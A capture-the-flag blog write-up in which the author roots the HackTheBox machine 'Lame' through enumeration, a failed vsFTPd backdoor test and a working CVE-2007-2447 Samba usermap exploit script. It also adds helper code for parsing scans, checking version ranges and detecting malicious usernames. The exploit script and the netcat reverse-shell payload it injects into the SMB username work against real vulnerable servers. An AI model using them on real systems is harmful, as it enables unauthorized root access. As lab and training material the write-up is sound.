Greetings friends! I was advised by some of my fellow OSCP aspirants to check out some of the retired HackTheBox machines in preparation for starting my PWK course. So I went ahead and coughed up the dough to buy a HTB VIP account, and got to work.

Having been informed that Metasploit use would be restricted in the OSCP exam, I decided to challenge myself to hack each machine without the use of Metasploit, so that I would be better prepared for the test.

I was given this handy guide to OSCP-Like HTB Boxes, and decided to start from the top:

OSCP-Like HTB Boxes

The first box in the Linux list is called “Lame,” and according to the ratings on HTB, it looked fairly easy:

Lame Simplicity

I fired up my Kali VM and got to work…


Enumeration

First I needed to know what services were running on the machine. I used the following nmap command to execute a scan which would run a series of scripts and attempt to detect the version information for the various services, as well as the OS of the host:

nmap -A 10.10.10.3 -oA Lame-Script-Scan

The results included a significant amount of information (I've cropped them a little to focus on the important data):

Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-19 03:43 EDT
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    [...]
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    [...]
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
    [...]
Host script results:
|_clock-skew: mean: 3h48m37s, deviation: 0s, median: 3h48m37s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-04-19T03:32:30-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
    [...]
Nmap done: 1 IP address (1 host up) scanned in 63.65 seconds

As I've noted before, I've been working through Georgia Weidman's Penetration Testing: A Hands-On Introduction to Hacking, and one of the exploits covered in the book relates to the vsftpd 2.3.4 service running on this machine, so I made a mental note to check that service for vulnerabilities. I also noticed that there are two other services that might be vulnerable: OpenSSH 4.7p1 and Samba smbd 3.0.20.
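To make the triage step above repeatable, here is a small parser for nmap's normal output, added as an example and not part of the original post. It pulls each open port's service and version string (plus the NSE script result printed directly under the port) into records, then matches the versions against a short watchlist built from the two findings discussed above: the vsftpd 2.3.4 banner and the Samba 3.0.20 to 3.0.24 range of CVE-2007-2447. The sample text is a constructed subset of the scan output shown above; the watchlist entries, function names and the finding wording are my own.

```python
import re
from typing import Dict, List

# Constructed sample: the relevant lines of the nmap -A output quoted above.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-19 03:43 EDT
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
"""

# "21/tcp  open  ftp  vsftpd 2.3.4" -> port, proto, state, service, version
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)
# First line of an NSE script result: "|_name: text" or "| name: text".
# Continuation lines ("|   OS: ...") deliberately do not match.
SCRIPT_LINE = re.compile(r"^\|[_ ](?P<script>[\w-]+):\s*(?P<output>.*)$")

# Version fingerprints worth a second look (my own watchlist, not nmap's).
# 3.0.25 release candidates before rc3 are also in the CVE-2007-2447 range;
# extend the pattern if your banners include them.
WATCHLIST = [
    (re.compile(r"vsftpd 2\.3\.4\b"),
     "vsftpd 2.3.4: a backdoored build of this version circulated, confirm it is the clean one"),
    (re.compile(r"Samba smbd 3\.0\.2[0-4]\b"),
     "Samba 3.0.20-3.0.24: inside the CVE-2007-2447 (username map script) range"),
]


def parse_nmap(text: str) -> List[Dict]:
    """Turn nmap's normal (stdout / -oN) output into a list of port records.

    Script output printed under a port is attached to that port; host-level
    script results after "Host script results:" are dropped.
    """
    records: List[Dict] = []
    current = None
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            current = None
            continue
        m = PORT_LINE.match(line)
        if m:
            current = {
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
                "version": m.group("version") or "",
                "scripts": {},
            }
            records.append(current)
            continue
        m = SCRIPT_LINE.match(line)
        if m and current is not None:
            current["scripts"][m.group("script")] = m.group("output")
    return records


def triage(records: List[Dict]) -> List[str]:
    """Return one finding string per watchlist hit or risky script result, in port order."""
    findings: List[str] = []
    for rec in records:
        if rec["state"] != "open":
            continue
        where = f"{rec['port']}/{rec['proto']}"
        for pattern, reason in WATCHLIST:
            if pattern.search(rec["version"]):
                findings.append(f"{where} {reason}")
        anon = rec["scripts"].get("ftp-anon", "")
        if "allowed" in anon:
            findings.append(f"{where} anonymous FTP login allowed")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(finding)
```

Feed it a real scan with `parse_nmap(open("Lame-Script-Scan.nmap").read())`; the `-oA` flag used above writes that file alongside the XML and grepable copies.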

Prioritizing My Targets

Considering that OpenSSH is the least likely of the three to have any vulnerabilities, I decided to put it lower on my list of target services. I chose to look at the vsFTPd service first, since I already had prior knowledge of a possible exploit for that service. If that didn't pan out, I would aim at the Samba service next.

Exploiting Very Secure FTP

The Very Secure FTP (vsFTPd) service had an ironic vulnerability in version 2.3.4 wherein a malicious programmer included a backdoor that would spawn a root shell listening on port 6200. Once the backdoor was discovered, the software was patched and a new version 2.3.4 was released without the backdoor. Testing for the backdoor is a simple matter: it is triggered by adding a smiley face :) to the end of the username when logging in.

root@kali:~# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anon:)
331 Please specify the password.
Password: [invisible]

Once logged in with these credentials, if the service was vulnerable, I should have been able to connect to a newly-opened port 6200 with a root shell.

root@kali:~# nc 10.10.10.3 6200
pwd
whoami
:(

It was clear to me that the attack was unsuccessful. Apparently, this machine was using the patched version of vsFTPd v2.3.4. Time to check the Samba service…

Exploiting Samba

The first thing I did when approaching the Samba service was to check to see if there were any exploits already installed in Kali. I might not be using Metasploit to attack the target, but there's no reason I couldn't use searchsploit to quickly find available exploits.

root@kali:~# searchsploit samba 3.0.20 -w
----------------------------------- --------------------------------------------
Exploit Title                      |  URL
----------------------------------- --------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Userna | https://www.exploit-db.com/exploits/16320
Samba < 3.0.20 - Remote Heap Overf | https://www.exploit-db.com/exploits/7701
----------------------------------- --------------------------------------------
Shellcodes: No Result

Only two results were returned, and the second result in the list only applied to Samba versions prior to 3.0.20 (unless I was mistaken and the < was inclusive). But the first result seemed to target versions between 3.0.20 and 3.0.25rc3, which meant it could work against my target. I looked for more information on the website listed and discovered that this exploit was covered by CVE-2007-2447.
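The question of whether the `<` in those titles is inclusive comes up every time a banner version sits right on a range boundary, and pre-release tags like `rc3` make it worse. The following is an added example (my own code, not searchsploit's or exploit-db's) that parses the version strings and the range part of a searchsploit title and decides whether a banner version falls inside it. It reads `<` as strictly less than and the lower bound as inclusive; that reading is my assumption about the listing convention, so the code also accepts `<=` if a title spells it out. The titles below reuse only the range heads visible in the output above; their descriptions are placeholders because the real ones are cut off.

```python
import re
from typing import List, Optional, Tuple

# Version token: dotted numbers plus an optional pre-release tag ("rc3", "beta1").
# Matching is anchored at the start only, so a distro suffix like "-Debian" is ignored.
VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:-?(alpha|beta|rc)(\d*))?", re.IGNORECASE)
PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}

# The range part of a searchsploit title (text before " - "):
#   "Samba 3.0.20 < 3.0.25rc3" -> low 3.0.20 (inclusive), high 3.0.25rc3 (exclusive)
#   "Samba < 3.0.20"           -> no lower bound
RANGE_RE = re.compile(
    r"^(?P<product>.+?)\s+(?:(?P<low>\S+)\s+)?<(?P<incl>=)?\s+(?P<high>\S+)$"
)

# Constructed titles: range heads from the searchsploit output above, descriptions are placeholders.
SEARCHSPLOIT_TITLES = [
    "Samba 3.0.20 < 3.0.25rc3 - (first entry, description elided)",
    "Samba < 3.0.20 - (second entry, description elided)",
]


def parse_version(text: str) -> Tuple[Tuple[int, ...], Tuple]:
    """Return a sortable key: (numeric parts padded to four, pre-release marker).

    Final releases get the marker (1,), pre-releases (0, rank, number), so that
    3.0.25rc3 < 3.0.25 and 3.0.25rc2 < 3.0.25rc3.
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"no version found in {text!r}")
    nums = tuple(int(part) for part in m.group(1).split("."))
    nums = nums + (0,) * (4 - len(nums))
    if m.group(2):
        pre: Tuple = (0, PRERELEASE_RANK[m.group(2).lower()], int(m.group(3) or 0))
    else:
        pre = (1,)
    return nums, pre


def parse_range(title: str) -> Tuple[str, Optional[Tuple], Tuple, bool]:
    """Split 'Product [low] < high - description' into (product, low, high, high_inclusive)."""
    head = title.split(" - ", 1)[0].strip()
    m = RANGE_RE.match(head)
    if not m:
        raise ValueError(f"not a range title: {title!r}")
    low = parse_version(m.group("low")) if m.group("low") else None
    return m.group("product"), low, parse_version(m.group("high")), bool(m.group("incl"))


def is_affected(version: str, title: str) -> bool:
    """True when low <= version < high ('<' strict; '<=' makes the upper bound inclusive)."""
    _, low, high, inclusive = parse_range(title)
    key = parse_version(version)
    if low is not None and key < low:
        return False
    return key <= high if inclusive else key < high


def affected_titles(banner_version: str, titles: List[str]) -> List[str]:
    """Filter a searchsploit result list down to the entries whose range covers this banner."""
    return [t for t in titles if is_affected(banner_version, t)]


if __name__ == "__main__":
    for title in affected_titles("3.0.20-Debian", SEARCHSPLOIT_TITLES):
        print("applies:", title)
```

On the banner from the scan, `3.0.20-Debian`, only the first entry survives, which matches the reasoning above; the second entry drops out because its strict upper bound is exactly 3.0.20.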

None of the links I checked on the CVE site provided any exploit code or tools, so I went to Google and searched for CVE-2007-2447 exploit -metasploit (including that last bit to avoid results for using Metasploit). In the results, I discovered a blog post that explained the vulnerability and included a link to a GitHub repository where a proof-of-concept (PoC) exploit could be found.

The exploit required Python 2.7 and the pysmb library, so I created a virtual environment and installed all the necessary tools, then created a copy of the script. I opened it up with vi and took a gander. The original code used a payload that I felt was needlessly complex. All I wanted was a simple netcat reverse shell, so I updated the script:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
    payload = "nc %s %s -e /bin/sh" % (lhost, lport)
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=1)
    except:
        print("[+] Payload was sent - check netcat !")

if __name__ == "__main__":
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        print(
            "[-] usage: python %s <RHOST> <RPORT> <LHOST> <LPORT>"
            % (sys.argv[0])
        )
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
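Both tricks on this box ride on the username field: the smiley that wakes the vsFTPd backdoor, and the backtick-wrapped command this script stuffs into the SMB username for the usermap script. From the defender's side they look the same, a username that no real account would ever have, so here is an added detection example (my own, not from the original post or the linked repository). It parses vsftpd's standard `[pid N] [user] OK|FAIL LOGIN: Client "ip"` log lines and flags usernames carrying the `:)` trigger or shell metacharacters; the username check itself is service-agnostic, so the same rule can be applied to usernames pulled from Samba's auth log once you know the format your log level produces. The log lines are constructed; the third one copies the shape of the usermap payload but with a harmless command.

```python
import re
from collections import Counter
from typing import Dict, List

# Constructed vsftpd-style log excerpt. vsftpd writes the username in square
# brackets on LOGIN lines; CONNECT lines carry no username and are skipped.
SAMPLE_VSFTPD_LOG = """\
Fri Apr 19 03:48:02 2019 [pid 4020] CONNECT: Client "10.10.14.7"
Fri Apr 19 03:48:05 2019 [pid 4021] [anon:)] FAIL LOGIN: Client "10.10.14.7"
Fri Apr 19 03:49:11 2019 [pid 4022] [anonymous] OK LOGIN: Client "10.10.14.7"
Fri Apr 19 03:51:40 2019 [pid 4023] [/=`nohup id`] FAIL LOGIN: Client "10.10.14.7"
Fri Apr 19 04:02:13 2019 [pid 4030] [makis] OK LOGIN: Client "10.10.10.50"
"""

LOGIN_RE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)
# Characters a legitimate username never needs but a command-injection payload does.
SHELL_META = set("`$;|&<>\n")


def username_reasons(user: str) -> List[str]:
    """Rules applied to one username, independent of which service logged it."""
    reasons: List[str] = []
    if ":)" in user:
        reasons.append("vsftpd 2.3.4 backdoor trigger ':)' in username")
    if any(ch in SHELL_META for ch in user):
        reasons.append("shell metacharacters in username (command-injection style)")
    return reasons


def scan_ftp_log(text: str) -> List[Dict]:
    """Return one alert per LOGIN line whose username trips a rule, in log order."""
    alerts: List[Dict] = []
    for line in text.splitlines():
        m = LOGIN_RE.search(line)
        if not m:
            continue
        reasons = username_reasons(m.group("user"))
        if reasons:
            alerts.append({
                "client": m.group("client"),
                "user": m.group("user"),
                "result": m.group("result"),
                "reasons": reasons,
            })
    return alerts


def per_client(alerts: List[Dict]) -> Dict[str, int]:
    """Count alerts by source address so a single noisy client stands out."""
    return dict(Counter(a["client"] for a in alerts))


if __name__ == "__main__":
    found = scan_ftp_log(SAMPLE_VSFTPD_LOG)
    for alert in found:
        print(alert["client"], repr(alert["user"]), "; ".join(alert["reasons"]))
    print(per_client(found))
```

Note that a FAIL result does not mean the attempt was harmless: the backdoor fires on the username before any password is checked, and the usermap script runs during the mapping step, so the login outcome is irrelevant to whether the payload executed. Alert on the username, not the result.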

With my script prepared, the next step was to test it out. First, I needed to set up a netcat listener to catch the reverse shell:

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...

With that taken care of, it was time to run the script:

(venv) root@kali:~# python exploit.py 10.10.10.3 139 10.10.14.7 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

With the script executed, I went back to my netcat listener to see if I'd gotten the shell, and sure enough I had!

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.3] 49754

I used the id command to see which account I'd logged into. The response thrilled me:

uid=0(root) gid=0(root)

I was logged in as root! Now it was a simple matter to find the root.txt and user.txt flags. (I added the #> in the following lines to denote which commands I typed.)

#> ls root -l
total 16
drwxr-xr-x 2 root root 4096 May 20  2012 Desktop
-rwx------ 1 root root  401 May 20  2012 reset_logs.sh
-rw------- 1 root root   33 Mar 14  2017 root.txt
-rw-r--r-- 1 root root  118 Apr 19 01:18 vnc.log
#> cat root/root.txt
92caac3be140ef409e45721348a4e9df    <--( root flag )
#> ls home -l
total 16
drwxr-xr-x 2 root    nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x 2 makis   makis   4096 Mar 14  2017 makis
drwxr-xr-x 2 service service 4096 Apr 16  2010 service
drwxr-xr-x 3    1001    1001 4096 May  7  2010 user
#> ls home/makis -l
total 4
-rw-r--r-- 1 makis makis 33 Mar 14  2017 user.txt
#> cat home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5    <--( user flag )

Bingo! I had both flags, and I'd rooted the box!

Conclusion

Having successfully rooted my first HTB target, I felt elated. Granted, this was one of the simplest targets on the service, but it feels good to get a win, and this proved to me that my training was paying off.

I'll continue to post write-ups of future HTB challenges, as I work through each machine in the OSCP-Like list. I sincerely hope that these machines will help me prepare for my upcoming PWK course and OSCP certification test. This machine was a fairly simple challenge, and it feels great to say I completed it without using Metasploit! But I know that I'll be facing even tougher challenges in the future.

I'll be sure to share all of my adventures here, of course. So stay tuned!